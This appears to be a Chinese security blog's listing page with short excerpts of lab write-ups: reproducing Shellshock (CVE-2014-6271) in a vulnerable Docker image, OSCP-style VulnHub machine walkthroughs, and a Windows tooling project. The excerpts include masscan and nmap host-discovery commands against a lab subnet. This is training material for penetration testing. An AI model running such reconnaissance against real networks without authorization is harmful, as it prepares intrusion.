CVE-2014-6271漏洞复现

0x00 前言要是平时我肯定不会想打去复现这个漏洞的,但是由于需要学习shellshock漏洞的利用,所以这里可以进行一下复现0x01 正文这里直接使用别人弄好的docker,简单又方便docker pull hmlio/vaas-cve-2014-6271下载完成之后,开启dockerdocker run -d -p 80:80 hmlio/vaas-cve-2014-6271访问...
原创
985阅读
0评论
0点赞
发布博客于 1 年前

oscp——symfonos:2

0x00 前言这个是练习的第5个机子。目标地址https://www.vulnhub.com/entry/symfonos-2,331/参考文章https://www.anquanke.com/post/id/182378https://blog.csdn.net/weixin_44214107/article/details/1005879360x01 实验1.信息收集1.1 ...
原创
3898阅读
0评论
0点赞
发布博客于 1 年前

oscp——symfonos:1

0x00 前言这个是练习的第四个机子。目标地址https://www.vulnhub.com/entry/symfonos-1,322参考文章https://www.jianshu.com/p/4dec72be54980x01 实验1.信息收集1.1 目标IP1.2 目标端口22,25,80,139,4452.攻击尝试2.1 端口攻击尝试21端口,就算知道没用也是要爆...
原创
883阅读
0评论
0点赞
发布博客于 1 年前

oscp——sunrise

0x00 前言这个是做的第三台机子目标地址https://www.vulnhub.com/entry/sunset-sunrise,406/0x01 实验1.信息收集1.1 目标IP192.168.25.1731.2 目标端口22,80,8080,33062 攻击尝试2.1 端口攻击尝试3306防止了远程连接22端口估计也爆破不出啥东西2.2 web攻击尝试...
原创
542阅读
0评论
0点赞
发布博客于 1 年前

oscp——LiterallyVulnerable

0x00 前言这是为了oscp做的第二台机子。0x01 实验1.探测直接masscan探测存活masscan --ping 192.168.25.1/24 --rate 1000000000000000000000000nmap 探测详细信息这里总共是开放了4个端口,21,22,80 655352.攻击尝试2.1 端口21ftp看起来是可以匿名访问。这里直接进行匿名...
原创
538阅读
0评论
0点赞
发布博客于 1 年前

oscp—Me and My Girlfriend 1练习

0x00 前言为oscp做准备的练习,Me and My Girlfriend 1。由于不知道怎么练习,就随便下载了一个进行练习在这里做一个笔记。0x01 实验下载好文件之后,配置为NET模式。1.目标探测探测这里使用了nmap进行探测,可以看到时间为10.4秒。nmap -sP -T4 192.168.25.1/24这里也可以使用masscan 进行扫描,可以明显感觉速度变快了...
原创
721阅读
0评论
1点赞
发布博客于 1 年前

自定义win下环境盒子开发-总纲

0x00 前言今年的一个想要实现的目标就是制作一个win下的环境盒子,从1月1日开始到现在,目前也获得了一些成果,故这里进行一个思路的记录,避免遗忘以及方便复习。0x01 架构主要架构是基于cmder来进行更改的,并且借鉴了pbox的思路,整体以cmd脚本+python脚本+自定义环境+自定义工具这四个部分组合完成,通过在cmder中去调用关键字,以及触发一些脚本机制来进行整个的响应过程。...
原创
342阅读
1评论
0点赞
发布博客于 1 年前